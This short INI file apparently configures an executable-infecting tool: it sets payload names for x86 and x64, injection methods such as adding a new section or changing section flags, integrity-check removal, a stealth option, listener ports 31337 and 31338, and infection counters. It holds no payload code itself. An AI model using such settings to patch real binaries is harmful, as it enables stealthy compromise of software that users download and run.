; INI-Config-File 
; 0 = false, 1 = true

[name]
section_name=default
section_name_random=1
payload_name_x86=default
payload_name_x64=default

[methods]
method_alignment=1
method_alignment_resize=1
method_new_section=1
method_change_flags=1

[integrity]
remove_integrity_check=1
try_stay_stealth=1

[server]
data_port=31337
data_interface=0
control_port=31338
control_interface=0
enable=1

[statistics]
infection_counter_x86=0
infection_counter_x64=0